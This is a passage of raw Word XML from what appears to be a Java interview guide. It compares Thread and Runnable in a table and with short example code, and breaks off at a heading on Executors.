          </w:tcPr>
          <w:p w14:paraId="3F78A170" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86"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Runnable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00812E86" w:rsidRPr="004E218C" w14:paraId="33F0FEC6" w14:textId="77777777" w:rsidTr="00812E86">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C5988AC"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71DD23F8"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Thread is a class.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BB9DA1A"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Runnable is an interface.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00812E86" w:rsidRPr="004E218C" w14:paraId="47D518B7" w14:textId="77777777" w:rsidTr="00812E86">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F6AB7EA"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Inheritance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C1E5882"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Can only </w:t>
            </w:r>
            <w:r w:rsidRPr="004E218C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>extend Thread</w:t>
            </w:r>
            <w:r w:rsidRPr="004E218C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (single inheritance).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33365E86"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Can implement </w:t>
            </w:r>
            <w:r w:rsidRPr="004E218C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Runnable</w:t>
            </w:r>
            <w:r w:rsidRPr="004E218C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> and extend another class (multiple inheritance).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00812E86" w:rsidRPr="004E218C" w14:paraId="3EDAAEF2" w14:textId="77777777" w:rsidTr="00812E86">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5521FCBF"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Task Representation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13EA042E"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Represents a thread of execution.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13AF158E"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Represents a task that can be executed by a thread.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00812E86" w:rsidRPr="004E218C" w14:paraId="75EC28BF" w14:textId="77777777" w:rsidTr="00812E86">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="667642E4"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Flexibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61F121E2"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Less flexible due to single inheritance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AADBB02"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More flexible as it can be used with any class that implements Runnable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00812E86" w:rsidRPr="004E218C" w14:paraId="07CC3982" w14:textId="77777777" w:rsidTr="00812E86">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FE40C50"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AB94CAD"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Used when you want to create a thread directly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61BF6D2D"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Used to represent a task that can be passed to a thread for execution.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00812E86" w:rsidRPr="004E218C" w14:paraId="439028D8" w14:textId="77777777" w:rsidTr="00812E86">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40C6E1C1"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thread Creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28CF856D"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You can directly create a thread by extending Thread.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C3E780C"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A Runnable object needs to be passed to a Thread object to create a thread.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00812E86" w:rsidRPr="004E218C" w14:paraId="18EDD72D" w14:textId="77777777" w:rsidTr="00812E86">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C7BC10F"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Memory Efficiency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02AA2715"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Each thread requires a separate Thread object, consuming more memory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54AA00CF"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Runnable can be used by multiple threads, consuming less memory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00812E86" w:rsidRPr="004E218C" w14:paraId="4213243D" w14:textId="77777777" w:rsidTr="00812E86">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="776498E2"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="694A1780"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The thread itself is created by extending Thread, and the run() method is implemented inside it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A747E03"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Runnable allows for more flexible task delegation by separating the task from the thread creation logic.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73620841" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86"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When to Use Each:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E3AC7D" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1124"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use Thread when</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435CE916" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1124"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>You need to directly control thread creation and management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E66DB3D" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1124"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>You don't need to extend any other class (because Java allows single inheritance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF5A2BB" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1124"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use Runnable when</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C70A52B" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1124"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>You need to separate the task (logic) from the thread management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787D362A" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1124"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>You need flexibility, as a class can implement Runnable and still extend another class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7693D766" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1124"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>You need to execute the same task with multiple threads (sharing the same Runnable instance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BB64DC" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1124"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>You want to avoid the overhead of extending Thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501908B0" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86"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Example with Both:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6F2DB0"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Implementing Runnable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2338AC67"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class MyRunnable implements Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503AC1CF"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792A0C98"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void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3220B9"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Runnable task is running");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671E3CA3"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0E09147B"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lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D636F4E" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB1B4CA"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Extending Thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E717EBA"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class MyThread extends Thread {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73177B23"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DBD830"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void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0187A0"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Thread task is running");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BCC4F7"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78DD0846"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52936FBF" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D32D836"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public class Main {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229D8A0D"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static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C5E712"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Using Runnable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133E68EC"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MyRunnable task = new MyRunnable();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4BCEDE"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hread thread1 = new Thread(task);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634C1022"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hread1.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7813E15C" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DB96DAD"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Using Thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB14503"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MyThread thread2 = new MyThread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B162A6"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hread2.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34225CFC"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255611DB" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F7BE05" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4841C040" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1125"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a class and is less flexible due to Java's single inheritance constraint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D792999" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1125"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an interface and allows greater flexibility, as it can be implemented by any class while still extending another class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3D9DF6" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1125"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is generally preferred for implementing concurrent tasks due to its separation of task and thread management and better memory efficiency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8248E1" w14:textId="482C12BE" w:rsidR="00BD73D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BD73D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="0AD929FA">
          <v:rect id="_x0000_i1826" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B75354" w14:textId="4ED12D3D" w:rsidR="00C836C6" w:rsidRPr="00CE4B95" w:rsidRDefault="004F4443">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="269" w:name="_Toc196307749"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is significance of Executors in Java</w:t>
      </w:r>
      <w:r w:rsidR="00C836C6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
